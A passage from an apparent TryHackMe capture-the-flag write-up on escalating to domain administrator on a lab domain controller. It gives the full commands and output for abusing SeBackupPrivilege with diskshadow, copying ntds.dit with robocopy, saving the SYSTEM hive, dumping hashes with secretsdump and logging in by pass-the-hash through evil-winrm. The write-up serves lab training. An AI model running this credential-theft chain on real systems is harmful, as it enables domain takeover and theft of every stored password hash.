geobour98@kali:~$ evil-winrm -i 10.10.43.148 -u xyan1d3 -p cyanide9amine5628                                                            
                                                                                                                         
Evil-WinRM shell v3.4                                                                                                    
                                                                                                                         
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented o
n this machine                                                                                                           
                                                                                                                         
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion    
                                                                                                                         
Info: Establishing connection to remote endpoint                                                                         
                                                                                                                         
*Evil-WinRM* PS C:\Users\xyan1d3\Documents> whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

The most interesting privileges are SeBackupPrivilege and SeRestorePrivilege.

We can follow the 1st method from this great article: Windows PrivEsc with SeBackupPrivilege (disk shadow, robocopy).

First create a file back_script.txt with contents:

1
2
3
4
5
6
7
8
9
set verbose onX
set metadata C:\Windows\Temp\meta.cabX
set context clientaccessibleX
set context persistentX
begin backupX
add volume C: alias cdriveX
createX
expose %cdrive% E:X
end backupX

Then, in the evil-winrm session upload the file back_script.txt.

  • Command: upload back_script.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
Evil-WinRM* PS C:\Users\xyan1d3\Documents> upload back_script.txt
Info: Uploading back_script.txt to C:\Users\xyan1d3\Documents\back_script.txt                                            
                                                                                                                         
                                                                                                                         
Data: 252 bytes of 252 bytes copied                                                                                      
                                                                                                                         
Info: Upload successful!                                                                                                 
                                                                                                                         
*Evil-WinRM* PS C:\Users\xyan1d3\Documents> dir                                                                          


    Directory: C:\Users\xyan1d3\Documents


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----       11/15/2022  12:21 PM            191 back_script.txt

Then, pass the script to diskshadow utility to create the shadow copy.

  • Command: diskshadow /s back_script.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
*Evil-WinRM* PS C:\Users\xyan1d3\Documents> diskshadow /s back_script.txt
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer:  HAVEN-DC,  11/15/2022 12:21:27 PM

-> set verbose on
-> set metadata C:\Windows\Temp\meta.cab
-> set context clientaccessible
-> set context persistent
-> begin backup
-> add volume C: alias cdrive
-> create
Excluding writer "Shadow Copy Optimization Writer", because all of its components have been excluded.
Component "\BCD\BCD" from writer "ASR Writer" is excluded from backup,
because it requires volume  which is not in the shadow copy set.
The writer "ASR Writer" is now entirely excluded from the backup because the top-level
non selectable component "\BCD\BCD" is excluded.

* Including writer "Task Scheduler Writer":
        + Adding component: \TasksStore

* Including writer "VSS Metadata Store Writer":
        + Adding component: \WriterMetadataStore
<snip>
Number of shadow copies listed: 1
-> expose %cdrive% E:
-> %cdrive% = {8751d494-c204-48ad-b15d-d9269228cb83}
The shadow copy was successfully exposed as E:\.
-> end backup
->
*Evil-WinRM* PS C:\Users\xyan1d3\Documents>

Then verify the contents of the E drive.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
*Evil-WinRM* PS C:\Users\xyan1d3\Documents> cd ../../..
*Evil-WinRM* PS C:\> mkdir temp
*Evil-WinRM* PS C:\> cd temp
*Evil-WinRM* PS C:\temp> dir E:


    Directory: E:\


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        5/21/2021   9:39 AM                PerfLogs
d-r---        5/21/2021  11:41 AM                Program Files
d-----        2/23/2021   6:21 AM                Program Files (x86)
d-r---        2/25/2021  10:18 AM                Users
d-----        5/21/2021  11:46 AM                Windows


*Evil-WinRM* PS C:\temp>

After that, copy the NTDS file using Robocopy to the temp folder we created in the C: drive.

  • Command: robocopy /b E:\Windows\ntds . ntds.dit
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
*Evil-WinRM* PS C:\temp> robocopy /b E:\Windows\ntds . ntds.dit                                                          
                                                                                                                         
-------------------------------------------------------------------------------                                          
   ROBOCOPY     ::     Robust File Copy for Windows                                                                      
-------------------------------------------------------------------------------                                          
                                                                                                                         
  Started : Tuesday, November 15, 2022 12:25:47 PM                                                                       
   Source : E:\Windows\ntds\                                                                                             
     Dest : C:\temp\                                                                                                     
                                                                                                                         
    Files : ntds.dit                                                                                                     
                                                                                                                         
  Options : /DCOPY:DA /COPY:DAT /B /R:1000000 /W:30                                                                      
                                                                                                                         
------------------------------------------------------------------------------                                           
                                                                                                                         
                           1    E:\Windows\ntds\                                                                         
            New File              16.0 m        ntds.dit
  0.0%
  0.3%
<snip>

Next we get the system registry hive that contains the key needed to decrypt the NTDS file with reg save command and verify that we have both ntds.dit and system.bak.

  • Command: reg save hklm\system C:\temp\system.bak
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
*Evil-WinRM* PS C:\temp> reg save hklm\system C:\temp\system.bak                                                         
The operation completed successfully.                                                                                    
                                                                                                                         
*Evil-WinRM* PS C:\temp> dir                                                                                             
                                                                                                                         
                                                                                                                         
    Directory: C:\temp                                                                                                   
                                                                                                                         
                                                                                                                         
Mode                LastWriteTime         Length Name                                                                    
----                -------------         ------ ----                                                                    
-a----       11/15/2022  12:22 PM       16777216 ntds.dit                                                                
-a----       11/15/2022  12:26 PM       17219584 system.bak                                                              
                                                                                                                         
                                                                                                                         
*Evil-WinRM* PS C:\temp>

Now, we can download these files.

  • Command: download C:\temp\ntds.dit /home/geobour98/ntds.dit
  • Command: download C:\temp\system.bak /home/geobour98/system.bak
1
2
3
4
5
6
7
8
9
10
11
*Evil-WinRM* PS C:\temp> download C:\temp\ntds.dit /home/geobour98/ntds.dit
Info: Downloading C:\temp\ntds.dit to /home/geobour98/ntds.dit

                                                             
Info: Download successful!

*Evil-WinRM* PS C:\temp> download C:\temp\system.bak /home/geobour98/system.bak

                                                             
Info: Download successful!

Now we can extract the Administrator's hash using secretsdump.py and use it to login with evil-winrm.

  • Command: sudo /opt/impacket/examples/secretsdump.py -system system.bak -ntds ntds.dit LOCAL > hashes1.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
geobour98@kali:~$ sudo /opt/impacket/examples/secretsdump.py -system system.bak -ntds ntds.dit LOCAL > hashes1.txt
geobour98@kali:~$ cat hashes1.txt
<snip>
Administrator:500:aad3b435b51404eeaad3b435b51404ee:9689931bed40ca5a2ce1218210177f0c:::
<snip>
geobour98@kali:~$ evil-winrm -i 10.10.43.148 -u Administrator -H 9689931bed40ca5a2ce1218210177f0c                                               
                                                                                                                                  
Evil-WinRM shell v3.4                                                                                                             
                                                                                                                                  
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this ma
chine                                                                                                                             
                                                                                                                                  
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion             
                                                                                                                                  
Info: Establishing connection to remote endpoint                                                                                  
                                                                                                                                  
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
raz0rblack\administrator

Now we can read the file root.xml in C:\Users\Administrator that contains a hex encoded string, which if decoded reveals the root flag.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
*Evil-WinRM* PS C:\Users\Administrator> type root.xml            
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">                                                  
  <Obj RefId="0">               
    <TN RefId="0">              
      <T>System.Management.Automation.PSCredential</T>           
      <T>System.Object</T>      
    </TN>                       
    <ToString>System.Management.Automation.PSCredential</ToString>                                                                
    <Props>                     
      <S N="UserName">Administrator</S>                          
      <SS N="Password">44616d6e20796f752061726520612067656e6975732e0a4275742c20492061706f6c6f67697a6520666f72206368656174696e6720796f75206c696b6520746869732e0a0a4865726520697320796f757220526f6f7420466c61670a54484d7b316234663436636334666261343633343832373364313
86463393164613230647d0a0a546167206d65206f6e2068747470733a2f2f747769747465722e636f6d2f5879616e3164332061626f75742077686174207061727
420796f7520656e6a6f796564206f6e207468697320626f7820616e642077686174207061727420796f75207374727567676c656420776974682e0a0a496620796
f7520656e6a6f796564207468697320626f7820796f75206d617920616c736f2074616b652061206c6f6f6b20617420746865206c696e75786167656e637920726
f6f6d20696e207472796861636b6d652e0a576869636820636f6e7461696e7320736f6d65206c696e75782066756e64616d656e74616c7320616e6420707269766
96c65676520657363616c6174696f6e2068747470733a2f2f7472796861636b6d652e636f6d2f726f6f6d2f6c696e75786167656e63792e0a</SS>
  </Obj>                        
</Objs>                         
*Evil-WinRM* PS C:\Users\Administrator>
1
2
3
4
5
6
7
8
9
10
11
geobour98@kali:~$ echo 44616d6e20796f752061726520612067656e6975732e0a4275742c20492061706f6c6f67697a6520666f72206368656174696e6720796f75206c696b6520746869732e0a0a4865726520697320796f757220526f6f7420466c61670a54484d7b31623466343663633466626134363334383237336431386463393164613230647d0a0a546167206d65206f6e2068747470733a2f2f747769747465722e636f6d2f5879616e3164332061626f75742077686174207061727420796f7520656e6a6f796564206f6e207468697320626f7820616e642077686174207061727420796f75207374727567676c656420776974682e0a0a496620796f7520656e6a6f796564207468697320626f7820796f75206d617920616c736f2074616b652061206c6f6f6b20617420746865206c696e75786167656e637920726f6f6d20696e207472796861636b6d652e0a576869636820636f6e7461696e7320736f6d65206c696e75782066756e64616d656e74616c7320616e642070726976696c65676520657363616c6174696f6e2068747470733a2f2f7472796861636b6d652e636f6d2f726f6f6d2f6c696e75786167656e63792e0a | xxd -r -p                   
Damn you are a genius.                                           
But, I apologize for cheating you like this.                                                                                      

Here is your Root Flag                                           
[REDACTED]                            

Tag me on https://twitter.com/Xyan1d3 about what part you enjoyed on this box and what part you struggled with.

If you enjoyed this box you may also take a look at the linuxagency room in tryhackme.
Which contains some linux fundamentals and privilege escalation https://tryhackme.com/room/linuxagency.

Proof of Concept (PoC image): Desktop View

This post is licensed under CC BY 4.0 by the author.